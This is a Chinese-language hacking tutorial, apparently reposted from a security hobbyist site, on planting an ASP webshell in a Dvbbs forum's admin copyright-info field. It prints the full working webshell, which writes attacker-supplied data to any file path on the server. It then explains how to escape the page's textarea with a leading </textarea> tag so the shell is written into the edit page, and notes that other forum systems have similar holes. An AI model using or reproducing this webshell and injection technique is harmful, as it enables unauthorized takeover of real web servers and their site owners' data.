好 版權(quán)信息 把他變成小馬

成功保存

但是沒有被執(zhí)行..

應(yīng)該是馬的問題

馬兒不行 當(dāng)然是更換了 這不 怪事出現(xiàn)了 你看..

看 命令成功完成! 非法操作! 這這么跑出來了?????????????

真是怪了難道我的馬兒真的長褪了?

研究了一下中以明白是怎么回事了..

看看我的馬兒的代碼,注意紅色的標(biāo)記
<body>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊蟲專用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>
</form>

再看看網(wǎng)頁的源代碼,注意橙色的標(biāo)記

<td width="50%" class="td1"> <U>論壇版權(quán)信息</U></td>
<td width="50%" class="td1" valign=top>
<textarea name="Copyright" cols="50" rows="5" id=TdCopyright>

<style>
body{
FILTER:progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#808080,endColorStr=#000);
color:#FFF;
font-size:9pt
}
</style>
<body>
<p>　</p>
<p>　</p>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊蟲專用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>
</form></textarea>
<a href="javascript:admin_Size(-5,'TdCopyright')">

看不明白?

我來解釋一下

看網(wǎng)頁的源代碼

<textarea name="Copyright" cols="50" rows="5" id=TdCopyright>

這是文本框的開頭標(biāo)記

爾我的小馬里面又有一個(gè)文本框結(jié)束的標(biāo)記

<textarea name=cyfddata rows="11" cols="90"></textarea>

所以瀏覽器就把

</textarea>以下的代碼解釋為文本框以外的位置了...

呵呵 這就相當(dāng)于把 </textarea>以下的代碼 寫進(jìn)了這個(gè)編輯頁面里面...

明白了吧

這對我們很有用處

使用

在小馬最上面加上</textarea>

保存

然后重新編輯

這時(shí) 我們的小馬已經(jīng)被'寫入"編輯頁面

剩下的就不用說了吧.....哈哈 淫蕩去咯....

ps:不光是動(dòng)網(wǎng) 還有其他的系統(tǒng)都有類似的漏洞

ps:不要吧思維光死停留在這里..想想我們可以.....

PS:有可能運(yùn)行不了,這取決于你的馬.

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。